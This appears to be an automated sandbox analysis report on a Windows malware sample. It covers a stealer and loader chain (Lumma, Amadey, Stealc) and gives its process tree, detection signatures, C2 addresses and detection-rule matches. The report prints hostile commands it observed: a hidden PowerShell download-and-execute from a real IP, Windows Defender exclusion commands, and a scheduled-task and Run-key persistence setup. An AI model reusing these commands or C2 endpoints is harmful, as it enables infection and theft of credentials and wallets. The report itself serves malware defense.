Windows Analysis Report
5EfYBe3nch.exe

Overview

General Information

Sample name: 5EfYBe3nch.exe (renamed because the original name is a hash value)
Original sample name: 2ba2329d40af33806efdb0bbe5aeb0ad.exe
Analysis ID: 1582701
MD5: 2ba2329d40af33806efdb0bbe5aeb0ad
SHA1: 31c237c3d02833010e8788c653e03c8637c4927f
SHA256: cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
Tags: exe, user-abuse_ch

Detection

LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected LiteHTTP Bot
Yara detected LummaC Stealer
Yara detected Poverty Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Creates HTA files
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 5EfYBe3nch.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\5EfYBe3nch.exe" MD5: 2BA2329D40AF33806EFDB0BBE5AEB0AD)
    • DLTDCR8UJINP8YM8Y.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe" MD5: 8AFA0085DF245EA0BE67A6A4BABA228D)
      • chrome.exe (PID: 2496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 8016 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • GIIIIJDHJE.exe (PID: 7620 cmdline: "C:\Users\user\Documents\GIIIIJDHJE.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
          • skotes.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
    • 31FYMQUCQX14ZVCZU2HAYNV7V.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • skotes.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • skotes.exe (PID: 8068 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • skotes.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)
    • iSHmPkn.exe (PID: 7540 cmdline: "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe" MD5: 27998D2440B5A856ECA1795EABB8FA23)
    • eXbhgU9.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" MD5: 9BE5AC720DCF1838FD5A2D7352672F66)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1888 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3128 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jyidkjkfhjawd.exe (PID: 4296 cmdline: "C:\YQNZByFp\jyidkjkfhjawd.exe" MD5: 1B40450E11F71DA7D6F3D9C025C078E0)
    • cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4476 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 420 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2892 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 3352 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • mshta.exe (PID: 4828 cmdline: mshta "C:\Temp\.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • powershell.exe (PID: 1228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • 483d2fa8a0d53818306efeb32d3.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
        • schtasks.exe (PID: 3872 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 3272 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
  • cmd.exe (PID: 5164 cmdline: cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta") MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 5728 cmdline: mshta "C:\Temp\\random.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 1696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 483d2fa8a0d53818306efeb32d3.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7960 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3808 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8116 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7756 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 2688 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 483d2fa8a0d53818306efeb32d3.exe (PID: 6288 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • schtasks.exe (PID: 3132 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5968 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1060 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6128 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3352 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5696 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 5168 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 483d2fa8a0d53818306efeb32d3.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • schtasks.exe (PID: 5212 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7608 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
{"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "framekgirus.shop", "abruptyopsn.shop", "noisycuttej.shop", "tirepublicerj.shop", "fancywaxxers.shop"], "Build id": "W0uk--"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author | Strings
C:\Temp\.gif | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
C:\Users\user\AppData\Local\Temp\1027024001\am.exe | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
C:\Temp\random.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen | strings listed below
  • 0x8a3e:$v1_1: newtask
  • 0x7374:$v1_6: payload
  • 0x7577:$v1_7: DownloadFile
  • 0x7584:$v1_8: RemoveFile
  • 0x89f0:$cnc1: &os=
  • 0x89fa:$cnc2: &pv=
  • 0x8a04:$cnc3: &ip=
  • 0x8a0e:$cnc4: &cn=
  • 0x8a18:$cnc5: &lr=
  • 0x8a22:$cnc6: &ct=
  • 0x8a2c:$cnc7: &bv=
  • 0x8a4e:$cnc8: &op=
  • 0x8a5c:$cnc9: &td=
  • 0x8a70:$cnc10: &uni=

Source | Rule | Description | Author | Strings
0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000002B.00000002.2673808874.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
00000049.00000002.2882969985.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.3.5EfYBe3nch.exe.14b4ba0.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
14.2.skotes.exe.fa0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
13.2.GIIIIJDHJE.exe.780000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
44.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
5.2.31FYMQUCQX14ZVCZU2HAYNV7V.exe.480000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
amsi32_1228.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_1696.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_980.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7768.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started
Author: Jonathan Cheong, oscd.community
Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4476, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 3272, ProcessName: schtasks.exe

Source: Registry Key set
Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
Data: Details: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am.cmd

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ParentProcessId: 7812, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', ProcessId: 1888, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
